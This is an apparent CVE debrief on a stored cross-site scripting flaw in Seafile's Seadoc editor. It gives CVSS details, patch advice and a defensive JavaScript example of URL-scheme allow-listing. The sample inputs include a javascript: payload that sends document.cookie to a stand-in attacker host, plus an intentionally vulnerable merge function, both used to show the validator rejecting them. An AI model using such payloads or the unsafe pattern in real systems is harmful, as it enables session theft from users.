PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-30587 Seafile CVE debrief

CVE-2026-30587 is a high-severity stored cross-site scripting issue in Seafile Server’s Seadoc editor. According to the CVE entry, an authenticated remote attacker can inject malicious JavaScript through WebSocket-driven document structure updates, specifically via the src attribute of embedded Excalidraw whiteboards or the href attribute of anchor tags; the payload persists in the document and runs in the browsers of other users who later open it. The issue is fixed in Seafile Server 13.0.17, 13.0.17-pro and 12.0.20-pro, and the CVE was published on 2026-03-25.

Vendor
Seafile
Product
Seafile Server (Seadoc editor)
CVSS
HIGH 8.7
CISA KEV
Not listed in stored evidence
Original CVE published
2026-03-25
Original CVE updated
2026-05-10
Advisory published
2026-03-25
Advisory updated
2026-05-10

Who should care

Seafile administrators, especially those running Seafile Server with Seadoc enabled, should treat this as a priority if users can edit documents or collaborate in the affected system. Security teams should pay particular attention to deployments where accounts are issued to external collaborators, contractors or other partially trusted users: the attack requires an authenticated account, but the injected content is stored and then executes in the browser of any other user who opens the document.

Technical summary

The official CVE/NVD metadata classifies this as CWE-79 (cross-site scripting, here the stored variant) with CVSS 3.1 vector AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N: reachable over the network, low attack complexity, low privileges (any authenticated account), user interaction required (a victim has to open the document or follow the link), a scope change (the payload runs in other users’ browsers), and high confidentiality and integrity impact with no availability impact. The vulnerability is described as improper sanitization of WebSocket messages related to document structure updates in the Seadoc editor. According to the CVE description, attacker-controlled values in embedded Excalidraw whiteboard src attributes or anchor href attributes can persist and later execute in a victim’s browser. Because the injection points are URL-bearing attributes rather than raw markup, the relevant browser sink is a navigation or resource load of an attacker-controlled URL (for example a javascript: URL), which HTML escaping alone does not prevent; the standard defence is an allow-list of URL schemes applied to those attributes before the value is stored.

Defensive priority

High. This is an authenticated stored XSS with broad confidentiality and integrity impact and a scope change in the CVSS vector. Organizations using affected Seafile Server versions should prioritize patching and then review document collaboration workflows, because stored content can affect other users after initial injection.

Recommended defensive actions

  • Upgrade Seafile Server to a fixed release identified in the CVE description: 13.0.17, 13.0.17-pro, or 12.0.20-pro, depending on your deployment line.
  • Review whether Seadoc is enabled and limit who can create or edit shared documents until patching is complete.
  • Treat user-supplied document structure data, including attribute values carried in WebSocket update messages, as untrusted, and verify that the patched version is deployed across every Seafile Server instance, including staging and test deployments.
  • If you cannot patch immediately, reduce exposure by restricting authenticated authoring access to trusted users only.
  • Check for suspicious document content involving embedded Excalidraw whiteboards or anchor tags created around the disclosure window.
  • After upgrading, validate that collaboration and document editing flows still function normally and that the patched behavior blocks script injection through the affected fields, for example by confirming from a test account that a javascript: URL placed in an anchor href or an embedded whiteboard src is rejected or neutralised rather than stored and rendered.
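The following is an added example, not Seafile or Seadoc code, illustrating the defensive pattern from the technical summary (allow-listing URL schemes on href/src attributes before a structure update is stored) and the audit step in the list above (scanning already-stored content for attribute values that would fail that allow-list). The node types, attribute names, update message shape and sample document are assumptions made for illustration; the real Seadoc data model is not described in the CVE text.

```javascript
// Added example, not Seafile/Seadoc code: allow-list validation of URL-bearing
// attributes (href on links, src on embedded whiteboards) in structure updates,
// plus an audit pass over stored content. Node types, attribute names and the
// update message shape are assumptions for illustration. Node.js 16.9+, no deps.

const SAFE_SCHEMES = new Set(["http:", "https:", "mailto:"]);

// Assumed schema: which attributes a structure update may set per node type,
// and what kind of value each must hold.
const NODE_SCHEMA = {
  link: { href: "url", title: "text" },
  excalidraw: { src: "url", width: "number" },
};

// True only for values that parse as a URL with an allow-listed scheme. The
// WHATWG parser strips surrounding whitespace, drops embedded tabs/newlines and
// lowercases the scheme, so "JaVaScRiPt:", " javascript:" and "java\tscript:"
// all resolve to javascript: and are rejected. Relative paths resolve against
// the assumed (never contacted) base origin and therefore pass as https:.
function isSafeUrl(value) {
  if (typeof value !== "string") return false;
  try {
    return SAFE_SCHEMES.has(new URL(value, "https://seafile.example.invalid/").protocol);
  } catch {
    return false;
  }
}

// Returns null if attrs is acceptable for nodeType, otherwise a reason string.
// Object.hasOwn stops keys like "__proto__" from matching inherited properties.
function validateAttrs(nodeType, attrs) {
  if (!Object.hasOwn(NODE_SCHEMA, nodeType)) return `unknown node type ${nodeType}`;
  if (!attrs || typeof attrs !== "object") return "attrs must be an object";
  const schema = NODE_SCHEMA[nodeType];
  for (const [key, value] of Object.entries(attrs)) {
    if (!Object.hasOwn(schema, key)) return `attribute ${key} not allowed on ${nodeType}`;
    const kind = schema[key];
    if (kind === "url" && !isSafeUrl(value)) return `unsafe URL in ${key}`;
    if (kind === "text" && typeof value !== "string") return `${key} must be a string`;
    if (kind === "number" && !Number.isFinite(value)) return `${key} must be a number`;
  }
  return null;
}

// Vulnerable pattern (the bug class in the CVE): attributes from the WebSocket
// message are merged into the stored document verbatim and later rendered into
// href/src, so a javascript: URL runs in the next viewer's browser.
function applyUpdateUnsafe(doc, update) {
  const node = doc.nodes.find((n) => n.id === update.nodeId);
  if (!node) return false;
  node.attrs = { ...node.attrs, ...update.attrs };
  return true;
}

// Hardened form: the whole update is rejected if any attribute fails the schema,
// so the sender's and the server's view of the document never diverge silently.
function applyUpdateSafe(doc, update) {
  const node = doc.nodes.find((n) => n.id === update.nodeId);
  if (!node || validateAttrs(node.type, update.attrs) !== null) return false;
  node.attrs = { ...node.attrs, ...update.attrs };
  return true;
}

// Audit pass for content stored before a fix: report every URL-bearing
// attribute that would not pass the allow-list today.
function auditDocument(doc) {
  const findings = [];
  for (const node of doc.nodes) {
    const schema = Object.hasOwn(NODE_SCHEMA, node.type) ? NODE_SCHEMA[node.type] : {};
    for (const [attr, kind] of Object.entries(schema)) {
      if (kind !== "url" || !Object.hasOwn(node.attrs, attr)) continue;
      if (!isSafeUrl(node.attrs[attr])) {
        findings.push({ nodeId: node.id, type: node.type, attr, value: node.attrs[attr] });
      }
    }
  }
  return findings;
}

// Constructed sample document and update messages (not real Seafile data).
function sampleDocument() {
  return { nodes: [
    { id: "n2", type: "link", attrs: { href: "https://docs.example.com/guide" } },
    { id: "n3", type: "excalidraw", attrs: { src: "/whiteboards/wb-17.json", width: 800 } },
  ] };
}
const UPDATES = [
  { nodeId: "n2", attrs: { href: "https://docs.example.com/v2" } },
  { nodeId: "n2", attrs: { href: "javascript:fetch('https://attacker.invalid/?c='+document.cookie)" } },
  { nodeId: "n3", attrs: { src: " JaVaScRiPt:alert(document.domain)" } },
];

// Runs the same updates through both paths and audits what each one stored.
function demo() {
  const unsafeDoc = sampleDocument();
  const safeDoc = sampleDocument();
  return {
    unsafeResults: UPDATES.map((u) => applyUpdateUnsafe(unsafeDoc, u)), // [true, true, true]
    safeResults: UPDATES.map((u) => applyUpdateSafe(safeDoc, u)),       // [true, false, false]
    unsafeFindings: auditDocument(unsafeDoc),                            // n2 href and n3 src
    safeFindings: auditDocument(safeDoc),                                // []
    safeHref: safeDoc.nodes[0].attrs.href,                               // https://docs.example.com/v2
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The scheme check deliberately parses with the WHATWG URL parser instead of matching a regular expression against the raw string, because the browser will normalise case, surrounding whitespace and embedded tab/newline characters before deciding how to handle the scheme; a string-based deny-list of "javascript:" misses those variants. Rejecting the entire update on any bad attribute, rather than silently dropping the offending value, also makes server-side rejections visible to the client and in logs, which is the signal a detection team wants when hunting for attempts after patching.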

Evidence notes

This debrief is based only on the supplied CVE/NVD metadata and the reference metadata included with the source item. The CVE description states the issue, affected/fixed versions, attack path, and injection points. NVD metadata provides the CVSS vector and CWE classification. The linked patch and release-note URLs were supplied as references, but their page contents were not fetched in the corpus provided here, so no additional implementation details are asserted beyond the CVE text.

Official resources

The CVE was published on 2026-03-25 and later marked modified on 2026-05-10 in the supplied metadata. No KEV listing was provided in the source corpus.